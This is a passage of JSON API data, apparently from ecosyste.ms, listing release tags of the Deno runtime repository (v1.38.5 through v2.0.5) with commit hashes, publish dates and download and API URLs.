o/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH